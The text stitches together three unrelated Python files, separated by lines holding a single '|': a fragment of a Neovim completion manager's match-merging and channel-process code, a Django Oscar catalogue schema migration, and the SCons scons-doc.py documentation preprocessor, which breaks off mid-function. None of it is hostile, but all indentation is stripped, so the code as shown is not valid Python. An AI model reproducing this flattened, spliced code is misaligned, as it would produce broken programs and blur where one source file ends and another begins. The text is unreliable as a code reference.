if not self._matches[name].get('enable',True):
logger.debug('<%s> ignore by disabled', name)
continue
source_startcol = self._matches[name]['startcol']
if source_startcol>col or source_startcol==0:
self._matches[name]['last_matches'] = []
logger.error('ignoring invalid startcol for %s %s', name, self._matches[name]['startcol'])
continue
source_matches = self._matches[name]['matches']
source_matches = self.process_matches(name,ctx,source_startcol,source_matches)
self._matches[name]['last_matches'] = source_matches
if not source_matches:
continue
# min non empty source_matches's source_startcol as startcol
if source_startcol < startcol:
startcol = source_startcol
except Exception as inst:
logger.exception('_refresh_completions process exception: %s', inst)
continue
# merge results of sources
for name in names:
try:
source_startcol = self._matches[name]['startcol']
source_matches = self._matches[name]['last_matches']
if not source_matches:
continue
prefix = ctx['typed'][startcol-1 : source_startcol-1]
for e in source_matches:
# do the padding in vimscript to avoid the rpc
# overhead of calling strdisplaywidth
e['padding'] = prefix
if 'abbr' not in e:
e['abbr'] = e['word']
e['snippet_word'] = e['word']
e['word'] = prefix + e['word']
matches += source_matches
except Exception as inst:
logger.exception('_refresh_completions process exception: %s', inst)
continue
if not matches:
startcol=len(ctx['typed']) or 1
logger.info('_refresh_completions names: %s, startcol: %s, matches cnt: %s', names, startcol, len(matches))
logger.debug('_refresh_completions names: %s, startcol: %s, matches: %s, source matches: %s', names, startcol, matches, self._matches)
self._complete(ctx, startcol, matches)
def process_matches(self,name,ctx,startcol,matches):
info = self._sources[name]
abbr = info.get('abbreviation','')
# formalize datastructure
formalized = []
for item in matches:
e = {}
if type(item)==type(''):
e['word'] = item
else:
e = copy.deepcopy(item)
e['icase'] = 1
formalized.append(e)
# filtering and sorting
result = self.matcher.process(info,ctx,startcol,formalized)
# fix some text
for e in result:
if 'menu' not in e:
if 'info' in e and e['info'] and len(e['info'])<50:
if abbr:
e['menu'] = "<%s> %s" % (abbr,e['info'])
else:
e['menu'] = e['info']
else:
# info too long
if abbr:
e['menu'] = "<%s>" % abbr
else:
# e['menu'] = "<%s> %s" % (self._sources[name]['abbreviation'], e['info'])
pass
return result
def _complete(self, ctx, startcol, matches):
if not matches and not self._last_matches:
# no need to fire complete message
logger.info('matches==0, _last_matches==0, ignore')
return
not_changed = 0
if self._last_startcol==startcol and self._last_matches==matches:
not_changed = 1
logger.info('ignore _complete call: self._last_startcol==startcol and self._last_matches==matches')
# Note: The snippet field will not be kept in v:completed_item. Use
# this trick to to hack
snippets = []
has_snippets = False
if self._completed_snippet_enable:
for m in matches:
if not m.get('snippet', None) and not m.get('is_snippet', None):
continue
has_snippets = True
snippet = m.get('snippet', '')
if 'info' not in m or not m['info']:
m['info'] = 'snippet@%s' % len(snippets)
else:
m['info'] += '\nsnippet@%s' % len(snippets)
# snippet word should not contain spaces
rp = m['snippet_word'].split(' ')[0]
m['word'] = m['word'][:-len(m['snippet_word'])] + rp
m['snippet_word'] = rp
snippets.append(dict(snippet=snippet, word=m['snippet_word']))
if has_snippets:
for m in matches:
if 'menu' not in m:
m['menu'] = ''
if m.get('snippet', None) or m.get('is_snippet', None):
# [+] sign indicates that this completion item is
# expandable
m['menu'] = '[+] ' + m['menu']
else:
m['menu'] = '[ ] ' + m['menu']
self.nvim.call('cm#_core_complete', ctx, startcol, matches, not_changed, snippets)
self._last_matches = matches
self._last_startcol = startcol
def _start_channel(self,info):
if 'channel' not in info:
logger.error("this source does not use channel: %s", info)
return
name = info['name']
channel = info['channel']
channel_type = channel.get('type','')
py = ''
if channel_type=='python3':
py = self._py3
elif channel_type=='python2':
py = self._py2
else:
logger.info("Unsupported channel_type [%s]",channel_type)
if name not in self._channel_processes:
self._channel_processes[name] = {}
if name not in self._channel_threads:
self._channel_threads[name] = {}
process_info = self._channel_processes[name]
thread_info = self._channel_threads[name]
# channel process already started
if 'proc' in process_info or 'thread' in thread_info:
return
if self._multi_thread and channel_type=='python3' and channel.get('multi_thread',1) and sys.version_info.major>=3:
logger.info("starting <%s> thread channel", name)
thread_info['thread'] = threading.Thread(
target=cm.start_and_run_channel,
name=name,
args=('channel', self._servername, name, channel['module'])
)
thread_info['thread'].start()
return
cmd = [py, self._start_py, 'channel', name, channel['module'], self._servername]
# has not been started yet, start it now
logger.info('starting channels for %s: %s',name, cmd)
proc = subprocess.Popen(cmd,stdin=subprocess.DEVNULL,stdout=sys.stdout,stderr=sys.stderr)
process_info['pid'] = proc.pid
process_info['proc'] = proc
logger.info('source <%s> channel pid: %s', name, proc.pid)
def cm_shutdown(self):
# wait for channel-threads' exit
for name in self._channel_threads:
tinfo = self._channel_threads[name]
if 'thread' not in tinfo:
continue
try:
logger.info("join <%s> thread", name)
tinfo['thread'].join(2)
logger.info("success join <%s> thread", name)
except Exception as ex:
logger.exception("timeout join <%s> thread", name)
# wait for normal exit
time.sleep(1)
procs = []
for name in self._channel_processes:
pinfo = self._channel_processes[name]
if 'proc' not in pinfo:
continue
proc = pinfo['proc']
try:
if proc.poll() is not None:
logger.info("channel %s already terminated", name)
continue
procs.append((name,proc))
logger.info("terminating channel %s", name)
proc.terminate()
except Exception as ex:
logger.exception("send terminate signal failed for %s", name)
if not procs:
return
# wait for terminated
time.sleep(1)
# kill all
for name,proc in procs:
try:
if proc.poll() is not None:
logger.info("channel %s has terminated", name)
continue
logger.info("killing channel %s", name)
proc.kill()
logger.info("hannel %s killed", name)
except Exception as ex:
logger.exception("send kill signal failed for %s", name)
def cm_start_channels(self,srcs,ctx):
names = sorted(srcs.keys(),key=lambda n: srcs[n]['priority'], reverse=True)
for name in names:
info = srcs[name]
if not info['enable']:
continue
# this source is not using channel
if 'channel' not in info:
continue
# channel already started
if info['channel'].get('id',None):
continue
if not self._check_scope(ctx,info):
continue
self._start_channel(info)
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import oscar.models.fields.autoslugfield
import django.db.models.deletion
import django.core.validators
import oscar.models.fields
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='AttributeOption',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('option', models.CharField(max_length=255, verbose_name='Option')),
],
options={
'verbose_name_plural': 'Attribute options',
'verbose_name': 'Attribute option',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='AttributeOptionGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
],
options={
'verbose_name_plural': 'Attribute option groups',
'verbose_name': 'Attribute option group',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('path', models.CharField(unique=True, max_length=255)),
('depth', models.PositiveIntegerField()),
('numchild', models.PositiveIntegerField(default=0)),
('name', models.CharField(max_length=255, db_index=True, verbose_name='Name')),
('description', models.TextField(verbose_name='Description', blank=True)),
('image', models.ImageField(upload_to='categories', verbose_name='Image', max_length=255, blank=True, null=True)),
('slug', models.SlugField(max_length=255, editable=False, verbose_name='Slug')),
('full_name', models.CharField(max_length=255, editable=False, db_index=True, verbose_name='Full Name')),
],
options={
'ordering': ['full_name'],
'verbose_name_plural': 'Categories',
'verbose_name': 'Category',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Option',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
('code', oscar.models.fields.autoslugfield.AutoSlugField(populate_from='name', unique=True, verbose_name='Code', max_length=128, editable=False, blank=True)),
('type', models.CharField(default='Required', max_length=128, verbose_name='Status', choices=[('Required', 'Required - a value for this option must be specified'), ('Optional', 'Optional - a value for this option can be omitted')])),
],
options={
'verbose_name_plural': 'Options',
'verbose_name': 'Option',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('structure', models.CharField(default='standalone', max_length=10, verbose_name='Product structure', choices=[('standalone', 'Stand-alone product'), ('parent', 'Parent product'), ('child', 'Child product')])),
('upc', oscar.models.fields.NullCharField(unique=True, verbose_name='UPC', max_length=64, help_text='Universal Product Code (UPC) is an identifier for a product which is not specific to a particular supplier. Eg an ISBN for a book.')),
('title', models.CharField(max_length=255, verbose_name='Title', blank=True)),
('slug', models.SlugField(max_length=255, verbose_name='Slug')),
('description', models.TextField(verbose_name='Description', blank=True)),
('rating', models.FloatField(editable=False, verbose_name='Rating', null=True)),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='Date created')),
('date_updated', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Date updated')),
('is_discountable', models.BooleanField(default=True, verbose_name='Is discountable?', help_text='This flag indicates if this product can be used in an offer or not')),
],
options={
'ordering': ['-date_created'],
'verbose_name_plural': 'Products',
'verbose_name': 'Product',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductAttribute',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
('code', models.SlugField(max_length=128, verbose_name='Code', validators=[django.core.validators.RegexValidator(regex='^[a-zA-Z\\-_][0-9a-zA-Z\\-_]*$', message="Code can only contain the letters a-z, A-Z, digits, minus and underscores, and can't start with a digit")])),
('type', models.CharField(default='text', max_length=20, verbose_name='Type', choices=[('text', 'Text'), ('integer', 'Integer'), ('boolean', 'True / False'), ('float', 'Float'), ('richtext', 'Rich Text'), ('date', 'Date'), ('option', 'Option'), ('entity', 'Entity'), ('file', 'File'), ('image', 'Image')])),
('required', models.BooleanField(default=False, verbose_name='Required')),
('option_group', models.ForeignKey(null=True, verbose_name='Option Group', help_text='Select an option group if using type "Option"', to='catalogue.AttributeOptionGroup', blank=True, on_delete=models.CASCADE)),
],
options={
'ordering': ['code'],
'verbose_name_plural': 'Product attributes',
'verbose_name': 'Product attribute',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductAttributeValue',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('value_text', models.TextField(blank=True, verbose_name='Text', null=True)),
('value_integer', models.IntegerField(blank=True, verbose_name='Integer', null=True)),
('value_boolean', models.NullBooleanField(verbose_name='Boolean')),
('value_float', models.FloatField(blank=True, verbose_name='Float', null=True)),
('value_richtext', models.TextField(blank=True, verbose_name='Richtext', null=True)),
('value_date', models.DateField(blank=True, verbose_name='Date', null=True)),
('value_file', models.FileField(upload_to='images/products/%Y/%m/', max_length=255, blank=True, null=True)),
('value_image', models.ImageField(upload_to='images/products/%Y/%m/', max_length=255, blank=True, null=True)),
('entity_object_id', models.PositiveIntegerField(blank=True, editable=False, null=True)),
('attribute', models.ForeignKey(verbose_name='Attribute', to='catalogue.ProductAttribute', on_delete=models.CASCADE)),
('entity_content_type', models.ForeignKey(null=True, editable=False, to='contenttypes.ContentType', blank=True, on_delete=models.CASCADE)),
('product', models.ForeignKey(verbose_name='Product', related_name='attribute_values', to='catalogue.Product', on_delete=models.CASCADE)),
('value_option', models.ForeignKey(null=True, verbose_name='Value option', to='catalogue.AttributeOption', blank=True, on_delete=models.CASCADE)),
],
options={
'verbose_name_plural': 'Product attribute values',
'verbose_name': 'Product attribute value',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.ForeignKey(verbose_name='Category', to='catalogue.Category', on_delete=models.CASCADE)),
('product', models.ForeignKey(verbose_name='Product', to='catalogue.Product', on_delete=models.CASCADE)),
],
options={
'ordering': ['product', 'category'],
'verbose_name_plural': 'Product categories',
'verbose_name': 'Product category',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductClass',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=128, verbose_name='Name')),
('slug', oscar.models.fields.autoslugfield.AutoSlugField(populate_from='name', unique=True, verbose_name='Slug', max_length=128, editable=False, blank=True)),
('requires_shipping', models.BooleanField(default=True, verbose_name='Requires shipping?')),
('track_stock', models.BooleanField(default=True, verbose_name='Track stock levels?')),
('options', models.ManyToManyField(verbose_name='Options', to='catalogue.Option', blank=True)),
],
options={
'ordering': ['name'],
'verbose_name_plural': 'Product classes',
'verbose_name': 'Product class',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductImage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original', models.ImageField(upload_to='images/products/%Y/%m/', max_length=255, verbose_name='Original')),
('caption', models.CharField(max_length=200, verbose_name='Caption', blank=True)),
('display_order', models.PositiveIntegerField(default=0, verbose_name='Display order', help_text='An image with a display order of zero will be the primary image for a product')),
('date_created', models.DateTimeField(auto_now_add=True, verbose_name='Date created')),
('product', models.ForeignKey(verbose_name='Product', related_name='images', to='catalogue.Product', on_delete=models.CASCADE)),
],
options={
'ordering': ['display_order'],
'verbose_name_plural': 'Product images',
'verbose_name': 'Product image',
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ProductRecommendation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ranking', models.PositiveSmallIntegerField(default=0, verbose_name='Ranking', help_text='Determines order of the products. A product with a higher value will appear before one with a lower ranking.')),
('primary', models.ForeignKey(verbose_name='Primary product', related_name='primary_recommendations', to='catalogue.Product', on_delete=models.CASCADE)),
('recommendation', models.ForeignKey(verbose_name='Recommended product', to='catalogue.Product', on_delete=models.CASCADE)),
],
options={
'ordering': ['primary', '-ranking'],
'verbose_name_plural': 'Product recomendations',
'verbose_name': 'Product recommendation',
'abstract': False,
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='productrecommendation',
unique_together=set([('primary', 'recommendation')]),
),
migrations.AlterUniqueTogether(
name='productimage',
unique_together=set([('product', 'display_order')]),
),
migrations.AlterUniqueTogether(
name='productcategory',
unique_together=set([('product', 'category')]),
),
migrations.AlterUniqueTogether(
name='productattributevalue',
unique_together=set([('attribute', 'product')]),
),
migrations.AddField(
model_name='productattribute',
name='product_class',
field=models.ForeignKey(null=True, verbose_name='Product type', related_name='attributes', to='catalogue.ProductClass', blank=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='attributes',
field=models.ManyToManyField(verbose_name='Attributes', help_text='A product attribute is something that this product may have, such as a size, as specified by its class', to='catalogue.ProductAttribute', through='catalogue.ProductAttributeValue'),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='categories',
field=models.ManyToManyField(through='catalogue.ProductCategory', verbose_name='Categories', to='catalogue.Category'),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='parent',
field=models.ForeignKey(null=True, verbose_name='Parent product', related_name='children', help_text="Only choose a parent product if you're creating a child product. For example if this is a size 4 of a particular t-shirt. Leave blank if this is a stand-alone product (i.e. there is only one version of this product).", to='catalogue.Product', blank=True, on_delete=models.CASCADE),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='product_class',
field=models.ForeignKey(verbose_name='Product type', on_delete=django.db.models.deletion.PROTECT, related_name='products', help_text='Choose what type of product this is', to='catalogue.ProductClass', null=True),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='product_options',
field=models.ManyToManyField(verbose_name='Product options', help_text="Options are values that can be associated with a item when it is added to a customer's basket. This could be something like a personalised message to be printed on a T-shirt.", to='catalogue.Option', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='recommended_products',
field=models.ManyToManyField(verbose_name='Recommended products', help_text='These are products that are recommended to accompany the main product.', to='catalogue.Product', through='catalogue.ProductRecommendation', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='attributeoption',
name='group',
field=models.ForeignKey(verbose_name='Group', related_name='options', to='catalogue.AttributeOptionGroup', on_delete=models.CASCADE),
preserve_default=True,
),
]
|
|
#!/usr/bin/env python
#
# Copyright (c) 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# scons-doc.py - an SGML preprocessor for capturing SCons output
# and inserting it into examples in our DocBook
# documentation
#
# Synopsis:
#
# scons-doc [OPTIONS] [.in files]
#
# When no input files are given, the folder doc/user/* is searched for .in files.
#
# Available options:
#
# -d, --diff create examples for the .in file and output a unified
# diff against the related .xml file
# -r, --run create examples for the .in file, but do not change
# any files
# -s, --simple_diff use a simpler output for the diff mode (no unified
# diff!)
# -u, --update create examples for the .in file and update the
# related .xml file
#
# This script looks for some SGML tags that describe SCons example
# configurations and commands to execute in those configurations, and
# uses TestCmd.py to execute the commands and insert the output from
# those commands into the SGML that we output. This way, we can run a
# script and update all of our example documentation output without
# a lot of laborious by-hand checking.
#
# An "SCons example" looks like this, and essentially describes a set of
# input files (program source files as well as SConscript files):
#
# <scons_example name="ex1">
# <file name="SConstruct" printme="1">
# env = Environment()
# env.Program('foo')
# </file>
# <file name="foo.c">
# int main() { printf("foo.c\n"); }
# </file>
# </scons_example>
#
# The <file> contents within the <scons_example> tag will get written
# into a temporary directory whenever example output needs to be
# generated. By default, the <file> contents are not inserted into text
# directly, unless you set the "printme" attribute on one or more files,
# in which case they will get inserted within a <programlisting> tag.
# This makes it easy to define the example at the appropriate
# point in the text where you intend to show the SConstruct file.
#
# Note that you should usually give the <scons_example> a "name"
# attribute so that you can refer to the example configuration later to
# run SCons and generate output.
#
# If you just want to show a file's contents without worry about running
# SCons, there's a shorter <sconstruct> tag:
#
# <sconstruct>
# env = Environment()
# env.Program('foo')
# </sconstruct>
#
# This is essentially equivalent to <scons_example><file printme="1">,
# but it's more straightforward.
#
# SCons output is generated from the following sort of tag:
#
# <scons_output example="ex1" os="posix">
# <scons_output_command>scons -Q foo</scons_output_command>
# <scons_output_command>scons -Q foo</scons_output_command>
# </scons_output>
#
# You tell it which example to use with the "example" attribute, and then
# give it a list of <scons_output_command> tags to execute. You can also
# supply an "os" tag, which specifies the type of operating system this
# example is intended to show; if you omit this, default value is "posix".
#
# The generated SGML will show the command line (with the appropriate
# command-line prompt for the operating system), execute the command in
# a temporary directory with the example files, capture the standard
# output from SCons, and insert it into the text as appropriate.
# Error output gets passed through to your error output so you
# can see if there are any problems executing the command.
#
import optparse
import os
import re
import sgmllib
import sys
import time
import glob
sys.path.append(os.path.join(os.getcwd(), 'QMTest'))
sys.path.append(os.path.join(os.getcwd(), 'build', 'QMTest'))
scons_py = os.path.join('bootstrap', 'src', 'script', 'scons.py')
if not os.path.exists(scons_py):
scons_py = os.path.join('src', 'script', 'scons.py')
scons_lib_dir = os.path.join(os.getcwd(), 'bootstrap', 'src', 'engine')
if not os.path.exists(scons_lib_dir):
scons_lib_dir = os.path.join(os.getcwd(), 'src', 'engine')
os.environ['SCONS_LIB_DIR'] = scons_lib_dir
import TestCmd
# The regular expression that identifies entity references in the
# standard sgmllib omits the underscore from the legal characters.
# Override it with our own regular expression that adds underscore.
sgmllib.entityref = re.compile('&([a-zA-Z][-_.a-zA-Z0-9]*)[^-_a-zA-Z0-9]')
# Classes for collecting different types of data we're interested in.
class DataCollector(object):
"""Generic class for collecting data between a start tag and end
tag. We subclass for various types of tags we care about."""
def __init__(self):
self.data = ""
def afunc(self, data):
self.data = self.data + data
class Example(DataCollector):
"""An SCons example. This is essentially a list of files that
will get written to a temporary directory to collect output
from one or more SCons runs."""
def __init__(self):
DataCollector.__init__(self)
self.files = []
self.dirs = []
class File(DataCollector):
"""A file, that will get written out to a temporary directory
for one or more SCons runs."""
def __init__(self, name):
DataCollector.__init__(self)
self.name = name
class Directory(DataCollector):
"""A directory, that will get created in a temporary directory
for one or more SCons runs."""
def __init__(self, name):
DataCollector.__init__(self)
self.name = name
class Output(DataCollector):
"""Where the command output goes. This is essentially
a list of commands that will get executed."""
def __init__(self):
DataCollector.__init__(self)
self.commandlist = []
class Command(DataCollector):
"""A tag for where the command output goes. This is essentially
a list of commands that will get executed."""
def __init__(self):
DataCollector.__init__(self)
self.output = None
Prompt = {
'posix' : '% ',
'win32' : 'C:\\>'
}
# The magick SCons hackery that makes this work.
#
# So that our examples can still use the default SConstruct file, we
# actually feed the following into SCons via stdin and then have it
# SConscript() the SConstruct file. This stdin wrapper creates a set
# of ToolSurrogates for the tools for the appropriate platform. These
# Surrogates print output like the real tools and behave like them
# without actually having to be on the right platform or have the right
# tool installed.
#
# The upshot: The wrapper transparently changes the world out from
# under the top-level SConstruct file in an example just so we can get
# the command output.
Stdin = """\
import os
import re
import SCons.Action
import SCons.Defaults
import SCons.Node.FS
platform = '%(osname)s'
Sep = {
'posix' : '/',
'win32' : '\\\\',
}[platform]
# Slip our own __str__() method into the EntryProxy class used to expand
# $TARGET{S} and $SOURCE{S} to translate the path-name separators from
# what's appropriate for the system we're running on to what's appropriate
# for the example system.
orig = SCons.Node.FS.EntryProxy
class MyEntryProxy(orig):
def __str__(self):
return str(self._subject).replace(os.sep, Sep)
SCons.Node.FS.EntryProxy = MyEntryProxy
# Slip our own RDirs() method into the Node.FS.File class so that the
# expansions of $_{CPPINC,F77INC,LIBDIR}FLAGS will have the path-name
# separators translated from what's appropriate for the system we're
# running on to what's appropriate for the example system.
orig_RDirs = SCons.Node.FS.File.RDirs
def my_RDirs(self, pathlist, orig_RDirs=orig_RDirs):
return [str(x).replace(os.sep, Sep) for x in orig_RDirs(self, pathlist)]
SCons.Node.FS.File.RDirs = my_RDirs
class Curry(object):
def __init__(self, fun, *args, **kwargs):
self.fun = fun
self.pending = args[:]
self.kwargs = kwargs.copy()
def __call__(self, *args, **kwargs):
if kwargs and self.kwargs:
kw = self.kwargs.copy()
kw.update(kwargs)
else:
kw = kwargs or self.kwargs
return self.fun(*self.pending + args, **kw)
def Str(target, source, env, cmd=""):
result = []
for cmd in env.subst_list(cmd, target=target, source=source):
result.append(' '.join(map(str, cmd)))
return '\\n'.join(result)
class ToolSurrogate(object):
def __init__(self, tool, variable, func, varlist):
self.tool = tool
if not isinstance(variable, list):
variable = [variable]
self.variable = variable
self.func = func
self.varlist = varlist
def __call__(self, env):
t = Tool(self.tool)
t.generate(env)
for v in self.variable:
orig = env[v]
try:
strfunction = orig.strfunction
except AttributeError:
strfunction = Curry(Str, cmd=orig)
# Don't call Action() through its global function name, because
# that leads to infinite recursion in trying to initialize the
# Default Environment.
env[v] = SCons.Action.Action(self.func,
strfunction=strfunction,
varlist=self.varlist)
def __repr__(self):
# This is for the benefit of printing the 'TOOLS'
# variable through env.Dump().
return repr(self.tool)
def Null(target, source, env):
pass
def Cat(target, source, env):
target = str(target[0])
f = open(target, "wb")
for src in map(str, source):
f.write(open(src, "rb").read())
f.close()
def CCCom(target, source, env):
target = str(target[0])
fp = open(target, "wb")
def process(source_file, fp=fp):
for line in open(source_file, "rb").readlines():
m = re.match(r'#include\s[<"]([^<"]+)[>"]', line)
if m:
include = m.group(1)
for d in [str(env.Dir('$CPPPATH')), '.']:
f = os.path.join(d, include)
if os.path.exists(f):
process(f)
break
elif line[:11] != "STRIP CCCOM":
fp.write(line)
for src in map(str, source):
process(src)
fp.write('debug = ' + ARGUMENTS.get('debug', '0') + '\\n')
fp.close()
public_class_re = re.compile('^public class (\S+)', re.MULTILINE)
def JavaCCom(target, source, env):
# This is a fake Java compiler that just looks for
# public class FooBar
# lines in the source file(s) and spits those out
# to .class files named after the class.
tlist = list(map(str, target))
not_copied = {}
for t in tlist:
not_copied[t] = 1
for src in map(str, source):
contents = open(src, "rb").read()
classes = public_class_re.findall(contents)
for c in classes:
for t in [x for x in tlist if x.find(c) != -1]:
open(t, "wb").write(contents)
del not_copied[t]
for t in not_copied.keys():
open(t, "wb").write("\\n")
def JavaHCom(target, source, env):
tlist = map(str, target)
slist = map(str, source)
for t, s in zip(tlist, slist):
open(t, "wb").write(open(s, "rb").read())
def JarCom(target, source, env):
target = str(target[0])
class_files = []
for src in map(str, source):
for dirpath, dirnames, filenames in os.walk(src):
class_files.extend([ os.path.join(dirpath, f)
for f in filenames if f.endswith('.class') ])
f = open(target, "wb")
for cf in class_files:
f.write(open(cf, "rb").read())
f.close()
# XXX Adding COLOR, COLORS and PACKAGE to the 'cc' varlist(s) by hand
# here is bogus. It's for the benefit of doc/user/command-line.in, which
# uses examples that want to rebuild based on changes to these variables.
# It would be better to figure out a way to do it based on the content of
# the generated command-line, or else find a way to let the example markup
# language in doc/user/command-line.in tell this script what variables to
# add, but that's more difficult than I want to figure out how to do right
# now, so let's just use the simple brute force approach for the moment.
ToolList = {
'posix' : [('cc', ['CCCOM', 'SHCCCOM'], CCCom, ['CCFLAGS', 'CPPDEFINES', 'COLOR', 'COLORS', 'PACKAGE']),
('link', ['LINKCOM', 'SHLINKCOM'], Cat, []),
('ar', ['ARCOM', 'RANLIBCOM'], Cat, []),
('tar', 'TARCOM', Null, []),
('zip', 'ZIPCOM', Null, []),
('BitKeeper', 'BITKEEPERCOM', Cat, []),
('CVS', 'CVSCOM', Cat, []),
('RCS', 'RCS_COCOM', Cat, []),
('SCCS', 'SCCSCOM', Cat, []),
('javac', 'JAVACCOM', JavaCCom, []),
('javah', 'JAVAHCOM', JavaHCom, []),
('jar', 'JARCOM', JarCom, []),
('rmic', 'RMICCOM', Cat, []),
],
'win32' : [('msvc', ['CCCOM', 'SHCCCOM', 'RCCOM'], CCCom, ['CCFLAGS', 'CPPDEFINES', 'COLOR', 'COLORS', 'PACKAGE']),
('mslink', ['LINKCOM', 'SHLINKCOM'], Cat, []),
('mslib', 'ARCOM', Cat, []),
('tar', 'TARCOM', Null, []),
('zip', 'ZIPCOM', Null, []),
('BitKeeper', 'BITKEEPERCOM', Cat, []),
('CVS', 'CVSCOM', Cat, []),
('RCS', 'RCS_COCOM', Cat, []),
('SCCS', 'SCCSCOM', Cat, []),
('javac', 'JAVACCOM', JavaCCom, []),
('javah', 'JAVAHCOM', JavaHCom, []),
('jar', 'JARCOM', JarCom, []),
('rmic', 'RMICCOM', Cat, []),
],
}
toollist = ToolList[platform]
filter_tools = '%(tools)s'.split()
if filter_tools:
toollist = [x for x in toollist if x[0] in filter_tools]
toollist = [ToolSurrogate(*t) for t in toollist]
toollist.append('install')
def surrogate_spawn(sh, escape, cmd, args, env):
pass
def surrogate_pspawn(sh, escape, cmd, args, env, stdout, stderr):
pass
SCons.Defaults.ConstructionEnvironment.update({
'PLATFORM' : platform,
'TOOLS' : toollist,
'SPAWN' : surrogate_spawn,
'PSPAWN' : surrogate_pspawn,
})
SConscript('SConstruct')
"""
# "Commands" that we will execute in our examples.
def command_scons(args, c, test, dict):
save_vals = {}
delete_keys = []
try:
ce = c.environment
except AttributeError:
pass
else:
for arg in c.environment.split():
key, val = arg.split('=')
try:
save_vals[key] = os.environ[key]
except KeyError:
delete_keys.append(key)
os.environ[key] = val
test.run(interpreter = sys.executable,
program = scons_py,
# We use ToolSurrogates to capture win32 output by "building"
# examples using a fake win32 tool chain. Suppress the
# warnings that come from the new revamped VS support so
# we can build doc on (Linux) systems that don't have
# Visual C installed.
arguments = '--warn=no-visual-c-missing -f - ' + ' '.join(args),
chdir = test.workpath('WORK'),
stdin = Stdin % dict)
os.environ.update(save_vals)
for key in delete_keys:
del(os.environ[key])
out = test.stdout()
out = out.replace(test.workpath('ROOT'), '')
out = out.replace(test.workpath('WORK/SConstruct'),
'/home/my/project/SConstruct')
lines = out.split('\n')
if lines:
while lines[-1] == '':
lines = lines[:-1]
#err = test.stderr()
#if err:
# sys.stderr.write(err)
return lines
def command_touch(args, c, test, dict):
if args[0] == '-t':
t = int(time.mktime(time.strptime(args[1], '%Y%m%d%H%M')))
times = (t, t)
args = args[2:]
else:
time.sleep(1)
times = None
for file in args:
if not os.path.isabs(file):
file = os.path.join(test.workpath('WORK'), file)
if not os.path.exists(file):
open(file, 'wb')
os.utime(file, times)
return []
def command_edit(args, c, test, dict):
try:
add_string = c.edit[:]
except AttributeError:
add_string = 'void edit(void) { ; }\n'
if add_string[-1] != '\n':
add_string = add_string + '\n'
for file in args:
if not os.path.isabs(file):
file = os.path.join(test.workpath('WORK'), file)
contents = open(file, 'rb').read()
open(file, 'wb').write(contents + add_string)
return []
def command_ls(args, c, test, dict):
def ls(a):
return [' '.join(sorted([x for x in os.listdir(a) if x[0] != '.']))]
if args:
l = []
for a in args:
l.extend(ls(test.workpath('WORK', a)))
return l
else:
return ls(test.workpath('WORK'))
def command_sleep(args, c, test, dict):
time.sleep(int(args[0]))
CommandDict = {
'scons' : command_scons,
'touch' : command_touch,
'edit' : command_edit,
'ls' : command_ls,
'sleep' : command_sleep,
}
def ExecuteCommand(args, c, t, dict):
try:
func = CommandDict[args[0]]
